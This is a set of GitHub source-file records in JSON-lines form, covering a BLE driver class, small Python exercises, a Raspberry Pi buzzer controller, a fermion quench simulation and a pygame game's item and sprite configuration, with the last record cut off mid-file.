list(reversed(uuid_array_lt))\r\n uuid = (base[2] << 8) + base[3]\r\n base[2] = 0\r\n base[3] = 0\r\n return cls(value=uuid, base=BLEUUIDBase(base, 0))\r\n\r\n\r\nclass BLEEnableParams(object):\r\n def __init__(self,\r\n vs_uuid_count,\r\n service_changed,\r\n periph_conn_count,\r\n central_conn_count,\r\n central_sec_count,\r\n attr_tab_size=driver.BLE_GATTS_ATTR_TAB_SIZE_DEFAULT,\r\n att_mtu_max=driver.GATT_MTU_SIZE_DEFAULT):\r\n self.vs_uuid_count = vs_uuid_count\r\n self.attr_tab_size = attr_tab_size\r\n self.service_changed = service_changed\r\n self.periph_conn_count = periph_conn_count\r\n self.central_conn_count = central_conn_count\r\n self.central_sec_count = central_sec_count\r\n self.att_mtu_max = att_mtu_max\r\n\r\n def to_c(self):\r\n ble_enable_params = driver.ble_enable_params_t()\r\n ble_enable_params.common_enable_params.p_conn_bw_counts = None\r\n ble_enable_params.common_enable_params.vs_uuid_count = self.vs_uuid_count\r\n ble_enable_params.gatt_enable_params.att_mtu = self.att_mtu_max\r\n ble_enable_params.gatts_enable_params.attr_tab_size = self.attr_tab_size\r\n ble_enable_params.gatts_enable_params.service_changed = self.service_changed\r\n ble_enable_params.gap_enable_params.periph_conn_count = self.periph_conn_count\r\n ble_enable_params.gap_enable_params.central_conn_count = self.central_conn_count\r\n ble_enable_params.gap_enable_params.central_sec_count = self.central_sec_count\r\n\r\n return ble_enable_params\r\n","repo_name":"QuestionMarque/blatann","sub_path":"blatann/nrf/nrf_types/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"20429354511","text":"\r\n# coding: utf-8\r\n\r\n# # Bedingte Wahrscheinlichkeit - Lösung\r\n\r\n# Zuerst wird der Code angepasst, sodass die Personen mit einer festen Wahrscheinlichkeit einem Alter zugeordnet werden (hier: 40%):\r\n\r\n# In[14]:\r\n\r\n\r\nfrom numpy import random\r\nrandom.seed(0)\r\n\r\ntotals = {20:0, 30:0, 40:0, 50:0, 60:0, 70:0}\r\npurchases = {20:0, 30:0, 40:0, 50:0, 60:0, 70:0}\r\ntotalPurchases = 0\r\nfor _ in range(100000):\r\n ageDecade = random.choice([20, 30, 40, 50, 60, 70])\r\n purchaseProbability = 0.4\r\n totals[ageDecade] += 1\r\n if (random.random() < purchaseProbability):\r\n totalPurchases += 1\r\n purchases[ageDecade] += 1\r\n\r\n\r\n# Als nächstes wird P(E|F) für eine Altersgruppe berechnet:\r\n\r\n# In[15]:\r\n\r\n\r\nPEF = purchases[30] / totals[30]\r\nprint(\"P(purchase | 30s): \" + str(PEF))\r\n\r\n\r\n# Berechnen von P(E):\r\n\r\n# In[16]:\r\n\r\n\r\nPE = totalPurchases / 100000.0\r\nprint(\"P(Purchase):\" + str(PE))\r\n\r\n\r\n# P(E|F) sehr Nah an P(E), sodass P und E höchst Wahrscheinlich voneinander unabhängige Variablen sind.\r\n","repo_name":"h3pdesign/New-Coding-Mac","sub_path":"Coding Projects/Python Machine Learning/Materialien/Bedingte Wahrscheinlichkeit - Loesung.py","file_name":"Bedingte Wahrscheinlichkeit - Loesung.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31165757786","text":"#This is a program exploring what is called \"The simplest impossible math problem\" called Collatz sequence.\n# You can read more about it here: https://en.wikipedia.org/wiki/Collatz_conjecture\n#This is from chapter 3 (Practice project)\n\ndef collatz(num):\n if num%2 == 0:\n return num//2\n else:\n return 3*num+1\n\nif __name__ == '__main__':\n num = input('Input 
an integer: ')\n num = int(num)\n i = 0\n while num != 1:\n num = collatz(num)\n print(num)\n i += 1\n print('Sequence length: ',i)\n\n","repo_name":"nicolabc/Automate-The-Boring-Stuff","sub_path":"Chapter 01~06 - Fundamentals/Collatz conjecture.py","file_name":"Collatz conjecture.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"75189170108","text":"import threading\n\nclass I_MEM(threading.Thread):\n #constructor\n def __init__(self, PC, CLK):\n self.PC = PC\n self.MyCLK = CLK\n threading.Thread.__init__(self,target = self.setDO, args = ())\n #self.DO = \"\";\n self.DO = self.getInstruction();\n\n def setDO(self):\n while True:\n #print(\"en loop de IMEM\")\n if(self.MyCLK.running):\n self.DO = self.getInstruction()\n\n def getInstruction(self):\n f = open(\"instrucciones.txt\", \"r\")\n linea = 0;\n for x in f:\n if(self.PC.getCount() == linea):\n return x[:-1]\n linea = linea+1\n f.close()\n\n\n","repo_name":"ger534/Proyecto2Arqui2","sub_path":"procesador/I_MEM.py","file_name":"I_MEM.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43710486706","text":"import RPi.GPIO as gpio\nfrom utils.DefaultLogger import Log\nfrom constants import *\nfrom utils.Execution import IntervalExecution\n\n\nclass TimedBuzzer:\n _INPUT_PIN = 27\n _DURATION_SECONDS = 2\n\n def __init__(self, device_id, device_manager, device_config):\n self._device_id = device_id\n self._device_manager = device_manager\n self._device_config = device_config\n gpio.setup(TimedBuzzer._INPUT_PIN, gpio.OUT)\n self._timer = IntervalExecution(self.off, TimedBuzzer._DURATION_SECONDS, tag=\"TimedBuzzer\", start=True)\n\n def cleanup(self):\n self._timer.quit()\n gpio.output(TimedBuzzer._INPUT_PIN, False)\n\n def off(self):\n Log.info(\"buzzer off\")\n gpio.output(TimedBuzzer._INPUT_PIN, False)\n\n def on(self):\n Log.info(\"buzzer on\")\n gpio.output(TimedBuzzer._INPUT_PIN, True)\n self._timer.reset()\n\nbuzzer_config = {\n \"off\": TimedBuzzer.off,\n \"on\": TimedBuzzer.on,\n\n # mandatory\n DEVICE_OBJECT: None,\n CONSTRUCTOR: TimedBuzzer,\n CLEANUP: TimedBuzzer.cleanup\n}\n","repo_name":"JCalabig/Home","sub_path":"devices/TimedBuzzer.py","file_name":"TimedBuzzer.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10424241031","text":"#-*- coding: utf-8 -*-\nu\"\"\"\n\n@author:\t\tMartí Congost\n@contact:\t\tmarti.congost@whads.com\n@organization:\tWhads/Accent SL\n@since:\t\t\tJuly 2008\n\"\"\"\nfrom warnings import warn\nwarn(\n \"woost.controllers.module.Module is deprecated, and its subclasses \"\n \"(LanguageModule and AuthenticationModule) have been relocated to \"\n \"woost.app\",\n DeprecationWarning\n)\n\n\nclass Module(object):\n\n def __init__(self, application):\n self.application = application\n\n","repo_name":"marticongost/woost","sub_path":"woost/controllers/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39485957376","text":"from core.repositories import BookingRepository\nfrom core.models import Booking, Movie\n\n\nclass TestBookingRepository(BookingRepository):\n def __init__(self):\n self.bookings: dict = []\n self._init()\n\n def faker(self):\n aMovie = Movie(\"Avengers 
5\", \"\")\n result = {}\n a = Booking()\n a.id = 1\n a.movie = aMovie\n a.seats = [\"A1\", \"A2\"]\n a.time = \"2PM\"\n a.owner = \"Steve\"\n a.date = \"2022-04-01\"\n result[a.id] = a\n\n bMovie = Movie(\"Avengers 4\", \"\")\n a = Booking()\n a.id = 2\n a.movie = bMovie\n a.seats = [\"A1\", \"A2\"]\n a.time = \"2PM\"\n a.owner = \"Rogers\"\n a.date = \"2022-02-02\"\n result[a.id] = a\n\n return result\n\n def _init(self):\n self.bookings = self.faker()\n\n def _save(self):\n pass\n \nTestBookingRepository.__test__ = False","repo_name":"IsaTippens/Groupware","sub_path":"core/repositories/test_booking_repository.py","file_name":"test_booking_repository.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28343845496","text":"from sqlalchemy.ext.asyncio import AsyncSession\nfrom db.models import User\n\n###########################################################\n# BLOCK FOR INTERACTION WITH DATABASE IN BUSINESS CONTEXT #\n###########################################################\n\n\nclass UserDAL:\n \"\"\"Data Access Layer for operating user info\"\"\"\n\n def __init__(self, db_session: AsyncSession):\n self.db_session = db_session\n\n async def create_user(\n self, name: str, surname: str, email: str\n ) -> User:\n new_user = User(\n name=name,\n surname=surname,\n email=email,\n )\n self.db_session.add(new_user)\n await self.db_session.flush()\n return new_user\n","repo_name":"virt-from-siberia/Python","sub_path":"[youtube] FASTAPI FULL TUTORIAL НА РЕАЛЬНОМ ПРОЕКТЕ/db/dals.py","file_name":"dals.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"12050666144","text":"\"\"\"Define settings for the sprites\"\"\"\nimport os\nfrom os import path\nimport pygame as pg\nfrom config.window import HEIGHT, TILESIZE, WIDTH\nfrom tools import strip_from_sheet as strip\nfrom itertools import cycle\nfrom logger import logger\n\ngame_folder = path.dirname('.')\nassets_folder = path.join(game_folder, 'assets')\nitems_folder = path.join(assets_folder, \"img\", 'items')\nsprites_folder = path.join(assets_folder, 'sprites')\n\n# player\nPLAYER_SPEED = 280\nPLAYER_ROT_SPEED = 200\nPLAYER_MAX_HP = 100\nPLAYER_MAX_MP = 50\nPLAYER_HIT_RECT = pg.Rect(0, 0, 35, 35)\n\n# enemy\nWAIT_TIME = 800\n\nMALUS_ARC = 0.001\n\n# trap\nTRAP_DAMAGE = 10\n\n# all items\nITEMS = {\n f.split('.png')[0]: pg.image.load(path.join(items_folder, f))\n for f in os.listdir(items_folder) if f.endswith('.png')}\n\n# equipables\nCONSUMABLE = {\n \"red_potion_small\": {\n \"image_name\": \"potion_02a\",\n \"price\": 10,\n \"weight\": 2,\n \"heal\": 30,\n \"shield\": 0,\n \"object_type\": \"consumable\"\n },\n \"blue_potion_small\": {\n \"image_name\": \"potion_02b\",\n \"price\": 10,\n \"weight\": 2,\n \"heal\": 0,\n \"shield\": 15,\n \"object_type\": \"consumable\"\n },\n \"cookie_small\": {\n \"image_name\": \"cookie_01a\",\n \"price\": 10,\n \"weight\": 2,\n \"heal\": 10,\n \"shield\": 0,\n \"object_type\": \"consumable\"\n },\n}\nSCOPE_HAND = 3 * TILESIZE\nSCOPE_SWORD = 5 * TILESIZE\nSCOPE_ARC = 13 * TILESIZE\n# il faut ajouter l'item type\nWEAPONS = {\n \"bronze_sword_small\": {\n \"image_name\": \"sword_01a\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 1,\n \"dice_value\": 2,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"steal_sword_small\": {\n 
\"image_name\": \"sword_01b\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 1,\n \"dice_value\": 3,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"sapphire_sword_small\": {\n \"image_name\": \"sword_01c\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 1,\n \"dice_value\": 4,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"gold_sword_small\": {\n \"image_name\": \"sword_01d\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 1,\n \"dice_value\": 5,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n\n },\n \"ruby_sword_small\": {\n \"image_name\": \"sword_01e\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 1,\n \"dice_value\": 6,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"bronze_sword_medium\": {\n \"image_name\": \"sword_02a\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 2,\n \"dice_value\": 3,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"steal_sword_medium\": {\n \"image_name\": \"sword_02b\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 2,\n \"dice_value\": 4,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"sapphire_sword_medium\": {\n \"image_name\": \"sword_02c\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 2,\n \"dice_value\": 5,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"gold_sword_medium\": {\n \"image_name\": \"sword_02d\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 2,\n \"dice_value\": 6,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"ruby_sword_medium\": {\n \"image_name\": \"sword_02e\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 2,\n \"dice_value\": 7,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"bronze_arc_small\": {\n \"image_name\": \"bow_01a\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 10,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"steal_arc_small\": {\n \"image_name\": \"bow_01b\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 11,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"sapphire_arc_small\": {\n \"image_name\": \"bow_01c\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 12,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"gold_arc_small\": {\n \"image_name\": \"bow_01d\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 13,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"ruby_arc_small\": {\n \"image_name\": \"bow_01e\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 14,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"bronze_arc_medium\": {\n \"image_name\": \"bow_02a\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 
15,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"steal_arc_medium\": {\n \"image_name\": \"bow_02b\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 16,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"sapphire_arc_medium\": {\n \"image_name\": \"bow_02c\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 17,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"gold_arc_medium\": {\n \"image_name\": \"bow_02d\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 18,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"ruby_arc_medium\": {\n \"image_name\": \"bow_02e\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 19,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"bronze_arc_large\": {\n \"image_name\": \"bow_03a\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 3,\n \"dice_value\": 15,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"steal_arc_large\": {\n \"image_name\": \"bow_03b\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 3,\n \"dice_value\": 16,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"sapphire_arc_large\": {\n \"image_name\": \"bow_03c\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 3,\n \"dice_value\": 17,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"gold_arc_large\": {\n \"image_name\": \"bow_03d\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 3,\n \"dice_value\": 18,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"ruby_arc_large\": {\n \"image_name\": \"bow_03e\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 3,\n \"dice_value\": 19,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"bronze_dagger_small\": {\n \"image_name\": \"sword_03a\",\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"dagger\",\n \"number_dice\": 1,\n \"dice_value\": 3,\n \"scope\": SCOPE_SWORD,\n \"price\": 10,\n \"object_type\": \"weapon\",\n },\n \"steal_dagger_small\": {\n \"image_name\": \"sword_03b\",\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"dagger\",\n \"number_dice\": 1,\n \"dice_value\": 4,\n \"scope\": SCOPE_SWORD,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"sapphire_dagger_small\": {\n \"image_name\": \"sword_03c\",\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"dagger\",\n \"number_dice\": 1,\n \"dice_value\": 5,\n \"scope\": SCOPE_SWORD,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"gold_dagger_small\": {\n \"image_name\": \"sword_03d\",\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"dagger\",\n \"number_dice\": 1,\n \"dice_value\": 6,\n \"scope\": SCOPE_SWORD,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"ruby_dagger_small\": {\n \"image_name\": \"sword_03e\",\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"dagger\",\n \"number_dice\": 1,\n \"dice_value\": 7,\n \"scope\": SCOPE_SWORD,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n}\n\nARMOR = { # on va utiliser ses champs là et faire des .keys pour la 
création depuis la map et là on va mettre des randints et pour l'attribution au marchant, on va en prendre entre 1 et 5 aléatoires\n \"bronze_helmet_small\": {\n \"image_name\": \"helmet_01a\",\n \"price\": 10,\n \"weight\": 10,\n \"shield\": 5,\n \"slot\": 'head',\n \"object_type\": \"armor\"\n },\n \"steal_helmet_small\": {\n \"image_name\": \"helmet_01b\",\n \"price\": 10,\n \"weight\": 10,\n \"shield\": 10,\n \"slot\": 'head',\n \"object_type\": \"armor\"\n },\n \"sapphire_helmet_small\": {\n \"image_name\": \"helmet_01c\",\n \"price\": 10,\n \"weight\": 10,\n \"shield\": 15,\n \"slot\": 'head',\n \"object_type\": \"armor\"\n },\n \"gold_helmet_small\": {\n \"image_name\": \"helmet_01d\",\n \"price\": 10,\n \"weight\": 15,\n \"shield\": 15,\n \"slot\": \"head\",\n \"object_type\": \"armor\"\n },\n \"ruby_helmet_small\": {\n \"image_name\": \"helmet_01e\",\n \"price\": 10,\n \"weight\": 15,\n \"shield\": 20,\n \"slot\": \"head\",\n \"object_type\": \"armor\"\n },\n \"bronze_helmet_medium\": {\n \"image_name\": \"helmet_02a\",\n \"price\": 10,\n \"weight\": 10,\n \"shield\": 10,\n \"slot\": 'head',\n \"object_type\": \"armor\"\n },\n \"steal_helmet_medium\": {\n \"image_name\": \"helmet_02b\",\n \"price\": 10,\n \"weight\": 10,\n \"shield\": 15,\n \"slot\": 'head',\n \"object_type\": \"armor\"\n },\n \"sapphire_helmet_medium\": {\n \"image_name\": \"helmet_02c\",\n \"price\": 10,\n \"weight\": 10,\n \"shield\": 20,\n \"slot\": 'head',\n \"object_type\": \"armor\"\n },\n \"gold_helmet_medium\": {\n \"image_name\": \"helmet_02d\",\n \"price\": 10,\n \"weight\": 15,\n \"shield\": 20,\n \"slot\": \"head\",\n \"object_type\": \"armor\"\n },\n \"ruby_helmet_medium\": {\n \"image_name\": \"helmet_02e\",\n \"price\": 10,\n \"weight\": 15,\n \"shield\": 25,\n \"slot\": \"head\",\n \"object_type\": \"armor\"\n },\n \"bronze_chest_small\": {\n \"image_name\": \"armor_01a\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 15,\n \"slot\": \"chest\",\n \"object_type\": \"armor\"\n },\n \"steal_chest_small\": {\n \"image_name\": \"armor_01b\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 20,\n \"slot\": \"chest\",\n \"object_type\": \"armor\"\n },\n \"sapphire_chest_small\": {\n \"image_name\": \"armor_01c\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 25,\n \"slot\": \"chest\",\n \"object_type\": \"armor\"\n },\n \"gold_chest_small\": {\n \"image_name\": \"armor_01d\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 25,\n \"slot\": \"chest\",\n \"object_type\": \"armor\"\n },\n \"ruby_chest_small\": {\n \"image_name\": \"armor_01e\",\n \"price\": 10,\n \"weight\": 30,\n \"shield\": 30,\n \"slot\": \"chest\",\n \"object_type\": \"armor\"\n },\n \"bronze_boots_small\": {\n \"image_name\": \"boots_01a\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 5,\n \"slot\": \"feet\",\n \"object_type\": \"armor\"\n },\n \"steal_boots_small\": {\n \"image_name\": \"boots_01b\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 10,\n \"slot\": \"feet\",\n \"object_type\": \"armor\"\n },\n \"sapphire_boots_small\": {\n \"image_name\": \"boots_01c\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 15,\n \"slot\": \"feet\",\n \"object_type\": \"armor\"\n },\n \"gold_boots_small\": {\n \"image_name\": \"boots_01d\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 15,\n \"slot\": \"feet\",\n \"object_type\": \"armor\"\n },\n \"ruby_boots_small\": {\n \"image_name\": \"boots_01e\",\n \"price\": 10,\n \"weight\": 30,\n \"shield\": 20,\n \"slot\": \"feet\",\n \"object_type\": \"armor\"\n }\n}\n\nSPELLS = {\n 
\"fireball\": {\n \"image_name\": \"fireball\",\n \"type\": \"attack\",\n \"scope\": 3 * TILESIZE,\n \"slot\": \"spell\",\n \"object_type\": \"spell\",\n \"time_to_live\": 4,\n \"number_dice\": 2,\n \"dice_value\": 10\n },\n \"heal\": {\n \"image_name\": \"heal\",\n \"type\": \"heal\",\n \"scope\": 5 * TILESIZE,\n \"slot\": \"spell\",\n \"object_type\": \"spell\",\n \"time_to_live\": 6,\n \"number_dice\": 2,\n \"dice_value\": 10\n }\n}\n\nOTHERS = {\n \"bronze_key_small\": {\n \"object_type\": \"other\",\n \"image_name\": \"key_01a\",\n \"weight\": 10,\n \"price\": 10\n }\n}\n\nITEMS_PROPERTIES = ARMOR | WEAPONS | SPELLS | OTHERS | CONSUMABLE\nITEMS_NAMES = list(ARMOR.keys()) + list(WEAPONS.keys()) + list(SPELLS.keys()\n ) + list(OTHERS.keys()) + list(CONSUMABLE.keys())\n\nWEAPONS_COLS = 5\n\nARMOR_COLS = WEAPONS_COLS\n\nCONSUMABLE_COLS = WEAPONS_COLS\n\n# Character\nWIDTH_CHARACTER = 300\nHEIGHT_CHARACTER = 300\nUSABLE_POINTS = 100\n\n# Bounce\nBOB_RANGE = 15\nBOB_SPEED = 0.4\n\n\n# Heros\nTYPES_HEROS = [\"wizard\", \"soldier\", \"thief\"]\nTYPES = TYPES_HEROS + [\"skeleton_F\", \"skeleton_R\", \"skeleton_W\", \"phantom_F\",\n \"phantom_R\", \"phantom_W\", \"goblin_F\", \"goblin_R\", \"goblin_W\", \"boss\", \"mini_boss\"]\nDIRECTIONS = [\"up\", \"down\", \"left\", \"right\", \"idle\"]\n\nASSETS_SPRITES = {\n _type: {\n key: cycle([pg.transform.scale(pg.image.load(path.join(\n sprites_folder, _type, key, f\"{i}.png\")), (TILESIZE, TILESIZE)) for i in range(3)]) for key in DIRECTIONS\n } for _type in TYPES if _type != 'boss'\n}\n\nASSET_BOSS = {\n 'boss': {\n key: cycle([pg.transform.scale(pg.image.load(path.join(\n sprites_folder, 'boss', key, f\"{i}.png\")), (96, 96)) for i in range(3)]) for key in DIRECTIONS\n }\n}\n\nASSETS_SPRITES = ASSETS_SPRITES | ASSET_BOSS\n\nASSETS_FIRE_BALL = [pg.image.load(path.join(sprites_folder, \"effects_zone\", \"fire_ball\",\n \"{:04d}.png\".format(i))) for i in range(1, 11)]\n\nASSETS_HEAL = [pg.image.load(path.join(sprites_folder, \"effects_zone\", \"heal\",\n \"{:04d}.png\".format(i))) for i in range(1, 60)]\n\nASSETS_MERCHANT = [pg.image.load(path.join(sprites_folder, \"merchant\", f\"{i}.png\"))\n for i in range(4)]\n\nASSETS_DOOR = [pg.transform.scale(\n pg.image.load(path.join(sprites_folder, \"door\", \"opening\", f\"{i}.png\")),\n (TILESIZE, TILESIZE)) for i in range(14)]\n\nASSETS_CHEST = [pg.transform.scale(\n pg.image.load(path.join(sprites_folder, \"chest\", f\"{i}.png\")),\n (TILESIZE, TILESIZE)) for i in range(8)]\n\nASSETS_TRAP = [pg.transform.scale(\n pg.image.load(path.join(sprites_folder, \"trap\", f\"{i}.png\")),\n (TILESIZE, TILESIZE)) for i in range(10)]\n\nASSETS_FLAMES = [pg.image.load(path.join(sprites_folder, \"flames\", f\"{i}.png\"))\n for i in range(6)]\n\nASSETS_CAMP_FIRE = [pg.image.load(path.join(sprites_folder, \"camp_fire\", \"{:04d}.png\".format(i)))\n for i in range(1, 9)]\n\nASSETS_CHANDELIER = [pg.image.load(path.join(sprites_folder, \"chandelier\", \"{:04d}.png\".format(i)))\n for i in range(1, 6)]\n\nASSETS_BOOK_OPENING = [pg.image.load(path.join(sprites_folder, \"book\", \"opening\", f\"{i}.png\"))\n for i in range(4)]\nASSETS_BOOK_NEXT = [pg.image.load(path.join(sprites_folder, \"book\", \"next\", f\"{i}.png\"))\n for i in range(5)]\n\nASSETS_CIRCLE = [pg.image.load(path.join(sprites_folder, \"circle\", \"{:04d}.png\".format(i)))\n for i in range(1, 60)]\n\nASSETS_CONFETTI = [pg.image.load(path.join(sprites_folder, \"confetti\", \"{:04d}.png\".format(i)))\n for i in range(1, 
170)]\n","repo_name":"Barbapapazes/dungeons-dragons","sub_path":"config/sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":17513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"39322798052","text":"from .tools import FermionicHamiltonian\nfrom .tools import correlation_functions\nimport numpy as np\nfrom scipy.sparse.linalg import expm\n\n\nclass sudden_quench:\n def __init__(self,H0: FermionicHamiltonian,H1: FermionicHamiltonian):\n H0.diagonalize()\n H1.diagonalize()\n self.H0, self.H1 = H0, H1\n self.eigs1, self.W1 = H1.eigs_complete, H1.W\n self.corr = correlation_functions(H0)\n self.w0 = self.H0.w.copy()\n self.time_evolve(0.)\n self.L = self.H0.L\n \n def set_H1(self,H1):\n H1.diagonalize()\n self.H1 = H1\n self.eigs1, self.W1 = H1.eigs_complete, H1.W\n \n def time_evolve(self,t: float):\n self.wt = np.einsum('ij,j,jk,kl->il',self.W1,np.exp(-1j*2.*self.eigs1*t),self.W1.T.conj(),self.w0,optimize=True)#self.W1 @ expm(-1j*2.*np.diag(self.eigs1)*t) @ self.W1.T.conj() @ self.w0\n self.corr.set_W(self.wt)\n self.set_correlation_functions()\n \n def energy(self, FH=None):\n self.corr.setUVfromW()\n if FH is None:\n return self.corr.energy(self.H1)\n else:\n self.corr_temp = correlation_functions()\n _, Wnew = np.linalg.eigh(FH.H)\n self.corr_temp.set_W(Wnew@Wnew.T@self.wt)\n self.corr_temp.L = self.L\n self.corr_temp.setUVfromW()\n self.corr_temp.set_correlation_functions()\n return self.corr_temp.energy(FH)\n \n def set_correlation_functions(self):\n self.corr.setUVfromW()\n self.corr.set_correlation_functions()","repo_name":"alessandro-santini/FreeFermions","sub_path":"sudden_quench.py","file_name":"sudden_quench.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"21430741942","text":"# -*- coding: utf-8 -*-\n\nfrom pymongo import MongoClient\nimport aiohttp\nimport asyncio\nfrom scraper import ScraperConfig\nfrom async_iterators import AdvertIterator\nfrom argparser import args\n\n\nasync def main():\n key = 